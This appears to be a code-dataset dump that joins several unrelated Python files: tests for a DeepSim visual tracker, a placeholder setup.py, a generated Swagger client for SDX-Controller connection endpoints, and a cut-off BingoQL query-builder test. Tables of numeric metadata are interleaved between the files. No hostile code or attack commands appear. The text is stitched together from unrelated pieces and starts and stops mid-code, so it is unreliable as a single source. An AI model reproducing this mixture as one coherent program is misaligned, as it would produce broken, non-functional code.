mesh_geom_scale=mesh_geom_scale2,
pose=pose2)
res = GetAllVisualsResponse()
res.success = True
res.status_message = ''
res.visuals = [expected_visual1.to_ros(),
expected_visual2.to_ros()]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_all_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
tracker.on_update_tracker(0.1, None)
visual1 = tracker.get_visual(link_name1, visual_name1)
visual2 = tracker.get_visual(link_name2, visual_name2)
assert visual1 == expected_visual1
assert visual2 == expected_visual2
# Check returned visual is a copy
assert tracker._visual_map[(link_name1, visual_name1)] == visual1
assert tracker._visual_map[(link_name1, visual_name1)] is not visual1
assert tracker._visual_map[(link_name2, visual_name2)] == visual2
assert tracker._visual_map[(link_name2, visual_name2)] is not visual2
self.get_visuals_mock.assert_not_called()
def test_get_visual_blocking(self, service_proxy_wrapper_mock):
link_name = myself()
visual_name = myself() + "_visual"
ambient = Color(0.1, 0.2, 0.3, 0.4)
diffuse = Color(0.2, 0.3, 0.4, 0.5)
specular = Color(0.3, 0.4, 0.5, 0.6)
emissive = Color(0.4, 0.5, 0.6, 0.7)
transparency = 0.3
visible = True
geometry_type = GeometryType.MESH
mesh_geom_filename = myself() + "_mesh_geom_filename1"
mesh_geom_scale = Vector3(1.0, 2.0, 3.0)
pose = Pose(position=Vector3(2.0, 3.0, 4.0),
orientation=Quaternion(3.0, 4.0, 5.0, 6.0))
expected_visual = Visual(link_name=link_name,
visual_name=visual_name,
material=Material(ambient=ambient,
diffuse=diffuse,
specular=specular,
emissive=emissive),
transparency=transparency,
visible=visible,
geometry_type=geometry_type,
mesh_geom_filename=mesh_geom_filename,
mesh_geom_scale=mesh_geom_scale,
pose=pose)
res = GetVisualsResponse()
res.status = [True]
res.success = True
res.visuals = [expected_visual.to_ros()]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
visual = tracker.get_visual(link_name, visual_name, blocking=True)
self.get_visuals_mock.assert_called_once_with([link_name], [visual_name])
assert visual == expected_visual
def test_get_visual_missing_in_dict(self, service_proxy_wrapper_mock):
link_name = myself()
visual_name = myself() + "_visual"
ambient = Color(0.1, 0.2, 0.3, 0.4)
diffuse = Color(0.2, 0.3, 0.4, 0.5)
specular = Color(0.3, 0.4, 0.5, 0.6)
emissive = Color(0.4, 0.5, 0.6, 0.7)
transparency = 0.3
visible = True
geometry_type = GeometryType.MESH
mesh_geom_filename = myself() + "_mesh_geom_filename1"
mesh_geom_scale = Vector3(1.0, 2.0, 3.0)
pose = Pose(position=Vector3(2.0, 3.0, 4.0),
orientation=Quaternion(3.0, 4.0, 5.0, 6.0))
expected_visual = Visual(link_name=link_name,
visual_name=visual_name,
material=Material(ambient=ambient,
diffuse=diffuse,
specular=specular,
emissive=emissive),
transparency=transparency,
visible=visible,
geometry_type=geometry_type,
mesh_geom_filename=mesh_geom_filename,
mesh_geom_scale=mesh_geom_scale,
pose=pose)
res = GetVisualsResponse()
res.status = [True]
res.success = True
res.visuals = [expected_visual.to_ros()]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
visual = tracker.get_visual(link_name, visual_name)
self.get_visuals_mock.assert_called_once_with([link_name], [visual_name])
assert visual == expected_visual
def test_get_visual_missing_and_failed_to_retrieve(self, service_proxy_wrapper_mock):
link_name = myself()
visual_name = myself() + "_visual"
res = GetVisualsResponse()
res.status = [False]
res.success = False
res.visuals = [None]
res.messages = ["Failed"]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
with self.assertRaises(DeepSimException):
tracker.get_visual(link_name, visual_name)
res.status = [False]
res.success = True
with self.assertRaises(DeepSimException):
tracker.get_visual(link_name, visual_name)
res.status = [True]
res.success = False
with self.assertRaises(DeepSimException):
tracker.get_visual(link_name, visual_name)
self.get_visuals_mock.assert_has_calls([
call([link_name], [visual_name]),
call([link_name], [visual_name]),
call([link_name], [visual_name])
])
def test_get_visuals(self, service_proxy_wrapper_mock):
link_name1 = myself() + "1"
visual_name1 = myself() + "1_visual"
ambient1 = Color(0.1, 0.2, 0.3, 0.4)
diffuse1 = Color(0.2, 0.3, 0.4, 0.5)
specular1 = Color(0.3, 0.4, 0.5, 0.6)
emissive1 = Color(0.4, 0.5, 0.6, 0.7)
transparency1 = 0.3
visible1 = True
geometry_type1 = GeometryType.MESH
mesh_geom_filename1 = myself() + "_mesh_geom_filename1"
mesh_geom_scale1 = Vector3(1.0, 2.0, 3.0)
pose1 = Pose(position=Vector3(2.0, 3.0, 4.0),
orientation=Quaternion(3.0, 4.0, 5.0, 6.0))
link_name2 = myself() + "2"
visual_name2 = myself() + "2_visual"
ambient2 = Color(0.2, 0.2, 0.3, 0.4)
diffuse2 = Color(0.3, 0.3, 0.4, 0.5)
specular2 = Color(0.4, 0.4, 0.5, 0.6)
emissive2 = Color(0.5, 0.5, 0.6, 0.7)
transparency2 = 0.5
visible2 = True
geometry_type2 = GeometryType.BOX
mesh_geom_filename2 = myself() + "_mesh_geom_filename2"
mesh_geom_scale2 = Vector3(2.0, 2.0, 3.0)
pose2 = Pose(position=Vector3(3.0, 3.0, 4.0),
orientation=Quaternion(4.0, 4.0, 5.0, 6.0))
expected_visual1 = Visual(link_name=link_name1,
visual_name=visual_name1,
material=Material(ambient=ambient1,
diffuse=diffuse1,
specular=specular1,
emissive=emissive1),
transparency=transparency1,
visible=visible1,
geometry_type=geometry_type1,
mesh_geom_filename=mesh_geom_filename1,
mesh_geom_scale=mesh_geom_scale1,
pose=pose1)
expected_visual2 = Visual(link_name=link_name2,
visual_name=visual_name2,
material=Material(ambient=ambient2,
diffuse=diffuse2,
specular=specular2,
emissive=emissive2),
transparency=transparency2,
visible=visible2,
geometry_type=geometry_type2,
mesh_geom_filename=mesh_geom_filename2,
mesh_geom_scale=mesh_geom_scale2,
pose=pose2)
res = GetAllVisualsResponse()
res.success = True
res.status_message = ''
res.visuals = [expected_visual1.to_ros(),
expected_visual2.to_ros()]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_all_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
tracker.on_update_tracker(0.1, None)
visual_map = tracker.get_visuals([link_name1, link_name2],
[visual_name1, visual_name2])
key1 = (link_name1, visual_name1)
key2 = (link_name2, visual_name2)
expected_visuals = {key1: expected_visual1,
key2: expected_visual2}
assert visual_map == expected_visuals
self.get_visuals_mock.assert_not_called()
def test_get_visuals_blocking(self, service_proxy_wrapper_mock):
link_name = myself()
visual_name = myself() + "_visual"
ambient = Color(0.1, 0.2, 0.3, 0.4)
diffuse = Color(0.2, 0.3, 0.4, 0.5)
specular = Color(0.3, 0.4, 0.5, 0.6)
emissive = Color(0.4, 0.5, 0.6, 0.7)
transparency = 0.3
visible = True
geometry_type = GeometryType.MESH
mesh_geom_filename = myself() + "_mesh_geom_filename1"
mesh_geom_scale = Vector3(1.0, 2.0, 3.0)
pose = Pose(position=Vector3(2.0, 3.0, 4.0),
orientation=Quaternion(3.0, 4.0, 5.0, 6.0))
expected_visual = Visual(link_name=link_name,
visual_name=visual_name,
material=Material(ambient=ambient,
diffuse=diffuse,
specular=specular,
emissive=emissive),
transparency=transparency,
visible=visible,
geometry_type=geometry_type,
mesh_geom_filename=mesh_geom_filename,
mesh_geom_scale=mesh_geom_scale,
pose=pose)
key = (link_name, visual_name)
expected_return = {key: expected_visual}
res = GetVisualsResponse()
res.status = [True]
res.success = True
res.visuals = [expected_visual.to_ros()]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
visuals = tracker.get_visuals([link_name], [visual_name], blocking=True)
self.get_visuals_mock.assert_called_once_with([link_name], [visual_name])
assert visuals == expected_return
def test_get_visuals_missing_in_dict(self, service_proxy_wrapper_mock):
link_name = myself()
visual_name = myself() + "_visual"
ambient = Color(0.1, 0.2, 0.3, 0.4)
diffuse = Color(0.2, 0.3, 0.4, 0.5)
specular = Color(0.3, 0.4, 0.5, 0.6)
emissive = Color(0.4, 0.5, 0.6, 0.7)
transparency = 0.3
visible = True
geometry_type = GeometryType.MESH
mesh_geom_filename = myself() + "_mesh_geom_filename1"
mesh_geom_scale = Vector3(1.0, 2.0, 3.0)
pose = Pose(position=Vector3(2.0, 3.0, 4.0),
orientation=Quaternion(3.0, 4.0, 5.0, 6.0))
expected_visual = Visual(link_name=link_name,
visual_name=visual_name,
material=Material(ambient=ambient,
diffuse=diffuse,
specular=specular,
emissive=emissive),
transparency=transparency,
visible=visible,
geometry_type=geometry_type,
mesh_geom_filename=mesh_geom_filename,
mesh_geom_scale=mesh_geom_scale,
pose=pose)
key = (link_name, visual_name)
expected_return = {key: expected_visual}
res = GetVisualsResponse()
res.status = [True]
res.success = True
res.visuals = [expected_visual.to_ros()]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
visuals = tracker.get_visuals([link_name], [visual_name])
self.get_visuals_mock.assert_called_once_with([link_name], [visual_name])
assert visuals == expected_return
def test_get_visuals_missing_and_failed_to_retrieve(self, service_proxy_wrapper_mock):
link_name = myself()
visual_name = myself() + "_visual"
res = GetVisualsResponse()
res.status = [False]
res.success = False
res.visuals = [None]
res.messages = ["Failed"]
service_proxy_wrapper_mock.side_effect = self.get_service_mock
self.get_visuals_mock.return_value = res
tracker = GetVisualTracker(is_singleton=False)
with self.assertRaises(DeepSimException):
tracker.get_visuals([link_name], [visual_name])
res.status = [False]
res.success = True
assert tracker.get_visuals([link_name], [visual_name]) == {(link_name, visual_name): None}
res.status = [True]
res.success = False
with self.assertRaises(DeepSimException):
tracker.get_visuals([link_name], [visual_name])
self.get_visuals_mock.assert_has_calls([
call([link_name], [visual_name]),
call([link_name], [visual_name]),
call([link_name], [visual_name])
])
def test_get_visuals_unmatched_length(self, service_proxy_wrapper_mock):
tracker = GetVisualTracker(is_singleton=False)
link_name = myself()
with self.assertRaises(ValueError):
tracker.get_visuals([link_name], [])
def test_set_material(self, service_proxy_wrapper_mock):
tracker = GetVisualTracker(is_singleton=False)
link_name = myself()
visual_name = myself() + '_visual'
key = (link_name, visual_name)
tracker._visual_map[key] = Visual()
expected_material = Material(ambient=Color(1.0, 2.0, 3.0))
tracker.set_material(link_name=link_name,
visual_name=visual_name,
material=expected_material)
assert expected_material == tracker.get_visual(link_name=link_name,
visual_name=visual_name).material
def test_set_material_visual_not_in_map(self, service_proxy_wrapper_mock):
tracker = GetVisualTracker(is_singleton=False)
link_name = myself()
visual_name = myself() + '_visual'
key = (link_name, visual_name)
new_material = Material(ambient=Color(1.0, 2.0, 3.0))
tracker.set_material(link_name=link_name,
visual_name=visual_name,
material=new_material)
assert key not in tracker._visual_map
def test_set_transparency(self, service_proxy_wrapper_mock):
tracker = GetVisualTracker(is_singleton=False)
link_name = myself()
visual_name = myself() + '_visual'
key = (link_name, visual_name)
tracker._visual_map[key] = Visual()
expected_transparency = 0.5
tracker.set_transparency(link_name=link_name,
visual_name=visual_name,
transparency=expected_transparency)
assert expected_transparency == tracker.get_visual(link_name=link_name,
visual_name=visual_name).transparency
def test_set_transparency_visual_not_in_map(self, service_proxy_wrapper_mock):
tracker = GetVisualTracker(is_singleton=False)
link_name = myself()
visual_name = myself() + '_visual'
key = (link_name, visual_name)
new_transparency = 0.5
tracker.set_transparency(link_name=link_name,
visual_name=visual_name,
transparency=new_transparency)
assert key not in tracker._visual_map
def test_set_visible(self, service_proxy_wrapper_mock):
tracker = GetVisualTracker(is_singleton=False)
link_name = myself()
visual_name = myself() + '_visual'
key = (link_name, visual_name)
tracker._visual_map[key] = Visual()
expected_visible = False
tracker.set_visible(link_name=link_name,
visual_name=visual_name,
visible=expected_visible)
assert expected_visible == tracker.get_visual(link_name=link_name,
visual_name=visual_name).visible
def test_set_visible_visual_not_in_map(self, service_proxy_wrapper_mock):
tracker = GetVisualTracker(is_singleton=False)
link_name = myself()
visual_name = myself() + '_visual'
key = (link_name, visual_name)
new_visible = False
tracker.set_visible(link_name=link_name,
visual_name=visual_name,
visible=new_visible)
assert key not in tracker._visual_map
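# --- Usage sketch (not part of the test module above) ---
# A brief, hedged illustration of the tracker behaviour these tests exercise.
# It assumes the classes already imported by this test module (GetVisualTracker,
# Material, Color); the link and visual names are hypothetical placeholders.
tracker = GetVisualTracker(is_singleton=False)

# get_visuals returns a dict keyed by (link_name, visual_name) tuples; the
# blocking keyword is exercised by the tests above.
visuals = tracker.get_visuals(["agent_link"], ["agent_link_visual"], blocking=True)

# The set_* helpers mutate the cached Visual for a known key and are silently
# ignored when the key is not present in the tracker's map.
tracker.set_material(link_name="agent_link",
                     visual_name="agent_link_visual",
                     material=Material(ambient=Color(1.0, 0.0, 0.0)))
tracker.set_transparency(link_name="agent_link",
                         visual_name="agent_link_visual",
                         transparency=0.5)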
| 44.387821
| 98
| 0.545382
| 2,962
| 27,698
| 4.82208
| 0.07056
| 0.042008
| 0.05391
| 0.05293
| 0.827417
| 0.819156
| 0.816425
| 0.800952
| 0.78919
| 0.78786
| 0
| 0.046321
| 0.36555
| 27,698
| 623
| 99
| 44.459069
| 0.76646
| 0.038126
| 0
| 0.800391
| 0
| 0
| 0.015803
| 0.002571
| 0
| 0
| 0
| 0
| 0.068493
| 1
| 0.037182
| false
| 0
| 0.029354
| 0
| 0.074364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43ea2617d9cfa592f1a11be2013c9c3e182350ea
| 214
|
py
|
Python
|
setup.py
|
PayThePizzo/OCR
|
900940ed29e1bcba9e30b77603f5de4738d856be
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
PayThePizzo/OCR
|
900940ed29e1bcba9e30b77603f5de4738d856be
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
PayThePizzo/OCR
|
900940ed29e1bcba9e30b77603f5de4738d856be
|
[
"Apache-2.0"
] | null | null | null |
# TODO: Create setup
# https://docs.python.org/3/distutils/setupscript.html
# https://docs.python.org/2/distutils/index.html
# https://docs.python.org/3/distutils/
# https://docs.python-guide.org/writing/structure/
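# --- Placeholder sketch for the TODO above ---
# A minimal setuptools-based setup.py; every metadata value below is an
# illustrative assumption, not taken from the repository.
from setuptools import setup, find_packages

setup(
    name="ocr",                 # assumed distribution name
    version="0.1.0",            # assumed initial version
    packages=find_packages(),
    python_requires=">=3.7",    # assumed minimum Python version
)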
| 42.8
| 54
| 0.757009
| 32
| 214
| 5.0625
| 0.5
| 0.222222
| 0.37037
| 0.333333
| 0.506173
| 0.345679
| 0
| 0
| 0
| 0
| 0
| 0.014778
| 0.051402
| 214
| 5
| 55
| 42.8
| 0.783251
| 0.953271
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0.2
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a11ae6d6a81f32f4184c9aeb79cb56b58ba4f98f
| 12,018
|
py
|
Python
|
swagger_client/api/connection_api.py
|
atlanticwave-sdx/sdx-controller-client
|
426453bf84e9522e857fd78139bb63429b9091cc
|
[
"MIT"
] | null | null | null |
swagger_client/api/connection_api.py
|
atlanticwave-sdx/sdx-controller-client
|
426453bf84e9522e857fd78139bb63429b9091cc
|
[
"MIT"
] | null | null | null |
swagger_client/api/connection_api.py
|
atlanticwave-sdx/sdx-controller-client
|
426453bf84e9522e857fd78139bb63429b9091cc
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
SDX-Controller
You can find out more about Swagger at [http://swagger.io](http://swagger.io) or on [irc.freenode.net, #swagger](http://swagger.io/irc/). # noqa: E501
OpenAPI spec version: 1.0.0
Contact: yxin@renci.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class ConnectionApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_connection(self, connection_id, **kwargs): # noqa: E501
"""Delete connection order by ID # noqa: E501
delete a connection # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_connection(connection_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int connection_id: ID of the connection that needs to be deleted (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_connection_with_http_info(connection_id, **kwargs) # noqa: E501
else:
(data) = self.delete_connection_with_http_info(connection_id, **kwargs) # noqa: E501
return data
def delete_connection_with_http_info(self, connection_id, **kwargs): # noqa: E501
"""Delete connection order by ID # noqa: E501
delete a connection # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_connection_with_http_info(connection_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int connection_id: ID of the connection that needs to be deleted (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['connection_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_connection" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'connection_id' is set
if ('connection_id' not in params or
params['connection_id'] is None):
raise ValueError("Missing the required parameter `connection_id` when calling `delete_connection`") # noqa: E501
collection_formats = {}
path_params = {}
if 'connection_id' in params:
path_params['connectionId'] = params['connection_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/connection/{connectionId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def getconnection_by_id(self, connection_id, **kwargs): # noqa: E501
"""Find connection by ID # noqa: E501
connection details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.getconnection_by_id(connection_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int connection_id: ID of connection that needs to be fetched (required)
:return: Connection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.getconnection_by_id_with_http_info(connection_id, **kwargs) # noqa: E501
else:
(data) = self.getconnection_by_id_with_http_info(connection_id, **kwargs) # noqa: E501
return data
def getconnection_by_id_with_http_info(self, connection_id, **kwargs): # noqa: E501
"""Find connection by ID # noqa: E501
connection details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.getconnection_by_id_with_http_info(connection_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int connection_id: ID of connection that needs to be fetched (required)
:return: Connection
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['connection_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method getconnection_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'connection_id' is set
if ('connection_id' not in params or
params['connection_id'] is None):
raise ValueError("Missing the required parameter `connection_id` when calling `getconnection_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'connection_id' in params:
path_params['connectionId'] = params['connection_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/connection/{connectionId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Connection', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def place_connection(self, body, **kwargs): # noqa: E501
"""Place an connection request from the SDX-Controller # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_connection(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Connection body: order placed for creating a connection (required)
:return: Connection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.place_connection_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.place_connection_with_http_info(body, **kwargs) # noqa: E501
return data
def place_connection_with_http_info(self, body, **kwargs): # noqa: E501
"""Place an connection request from the SDX-Controller # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_connection_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Connection body: order placed for creating a connection (required)
:return: Connection
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method place_connection" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `place_connection`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
            '/connection', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Connection', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
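# --- Usage sketch (not part of the generated client above) ---
# It mirrors the synchronous/asynchronous pattern described in the method
# docstrings and assumes an ApiClient configured to reach a running
# SDX-Controller; the connection ID 42 is purely illustrative.
from swagger_client.api_client import ApiClient

api = ConnectionApi(ApiClient())

# Synchronous (default): the Connection model is returned directly.
connection = api.getconnection_by_id(42)

# Asynchronous: a thread-like object is returned, as the docstrings show.
thread = api.getconnection_by_id(42, async_req=True)
connection = thread.get()

# Deleting a connection by ID.
api.delete_connection(42)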
| 37.911672
| 156
| 0.615161
| 1,382
| 12,018
| 5.107815
| 0.125904
| 0.046466
| 0.023799
| 0.030599
| 0.884686
| 0.872362
| 0.865278
| 0.846721
| 0.839921
| 0.836521
| 0
| 0.015625
| 0.297054
| 12,018
| 316
| 157
| 38.031646
| 0.819957
| 0.342153
| 0
| 0.751515
| 0
| 0
| 0.177967
| 0.037271
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042424
| false
| 0
| 0.024242
| 0
| 0.127273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a12b0572dc9ab7b2550550a3f10d1180c2c5eded
| 6,797
|
py
|
Python
|
utils/indigo-service/service/v2/bingo_ql/test.py
|
tsingdao-Tp/Indigo
|
b2d73faebb6a450e9b3d34fed553fad4f9d0012f
|
[
"Apache-2.0"
] | 204
|
2015-11-06T21:34:34.000Z
|
2022-03-30T16:17:01.000Z
|
utils/indigo-service/service/v2/bingo_ql/test.py
|
tsingdao-Tp/Indigo
|
b2d73faebb6a450e9b3d34fed553fad4f9d0012f
|
[
"Apache-2.0"
] | 509
|
2015-11-05T13:54:43.000Z
|
2022-03-30T22:15:30.000Z
|
utils/indigo-service/service/v2/bingo_ql/test.py
|
tsingdao-Tp/Indigo
|
b2d73faebb6a450e9b3d34fed553fad4f9d0012f
|
[
"Apache-2.0"
] | 89
|
2015-11-17T08:22:54.000Z
|
2022-03-17T04:26:28.000Z
|
import unittest
from query import QueryBuilder
class TestBingoQL(unittest.TestCase):
def setUp(self):
self.builder = QueryBuilder()
def testQueryByPropName(self):
query = self.builder.build_query('"monoisotopic_weight"')
self.assertEquals(u"(elems->>'y' = %(property_term_0)s)", query)
self.assertEquals({'property_term_0': u'monoisotopic_weight'}, self.builder.bind_params)
query = self.builder.build_query('"BBB log([brain]:[blood])"')
self.assertEquals(u"(elems->>'y' = %(property_term_0)s)", query)
self.assertEquals({'property_term_0': u'bbb log([brain]:[blood])'}, self.builder.bind_params)
query = self.builder.build_query('~"count"')
self.assertEquals(u"(elems->>'y' LIKE %(property_term_0)s)", query)
self.assertEquals({'property_term_0': u'%count%'}, self.builder.bind_params)
query = self.builder.build_query('count')
self.assertEquals(u"(elems->>'y' LIKE %(property_term_0)s)", query)
self.assertEquals({'property_term_0': u'%count%'}, self.builder.bind_params)
def testQueryPropWithValue(self):
query = self.builder.build_query('"atom_count" != 30')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND jsonb_typeof(elems->'y') = 'number' AND (elems->>'y')::float != %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'atom_count', 'property_value_0': '30'}, self.builder.bind_params)
query = self.builder.build_query('"weight" > 0.537')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND jsonb_typeof(elems->'y') = 'number' AND (elems->>'y')::float > %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'weight', 'property_value_0': '0.537'}, self.builder.bind_params)
query = self.builder.build_query('count > 25')
self.assertEquals(u"(elems->>'x' LIKE %(property_term_0)s AND jsonb_typeof(elems->'y') = 'number' AND (elems->>'y')::float > %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'%count%', 'property_value_0': '25'}, self.builder.bind_params)
query = self.builder.build_query('"formula" = "C14H21N3O2"')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND elems->>'y' = %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'formula', 'property_value_0': 'c14h21n3o2'}, self.builder.bind_params)
query = self.builder.build_query("'formula' != " + '"C14H21N3O2"')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND elems->>'y' != %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'formula', 'property_value_0': 'c14h21n3o2'}, self.builder.bind_params)
query = self.builder.build_query('~"molecular formula" = "C14H21N3O2"')
self.assertEquals(u"(elems->>'x' LIKE %(property_term_0)s AND elems->>'y' = %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'%molecular formula%', 'property_value_0': 'c14h21n3o2'}, self.builder.bind_params)
query = self.builder.build_query('formula = "C14H21N3O2"')
self.assertEquals(u"(elems->>'x' LIKE %(property_term_0)s AND elems->>'y' = %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'%formula%', 'property_value_0': 'c14h21n3o2'}, self.builder.bind_params)
query = self.builder.build_query("'formula' ~ 'C14H21N3O2'")
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND elems->>'y' LIKE %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'formula', 'property_value_0': '%c14h21n3o2%'}, self.builder.bind_params)
query = self.builder.build_query("formula !~ C14H21N3O2")
self.assertEquals(u"(elems->>'x' LIKE %(property_term_0)s AND elems->>'y' NOT LIKE %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'%formula%', 'property_value_0': '%c14h21n3o2%'}, self.builder.bind_params)
query = self.builder.build_query('"P-gp category_Probability" ~ "no"')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND elems->>'y' LIKE %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'p-gp category_probability', 'property_value_0': '%no%'}, self.builder.bind_params)
query = self.builder.build_query('"PPB90 category_Probability" ~ "high = 0.18;"')
self.assertEquals(u"(elems->>'x' = %(property_term_0)s AND elems->>'y' LIKE %(property_value_0)s)", query)
self.assertEquals({'property_term_0': u'ppb90 category_probability', 'property_value_0': u'%high = 0.18;%'}, self.builder.bind_params)
query = self.builder.build_query('"molecular_formula" !~ "C14H21N3O2"')
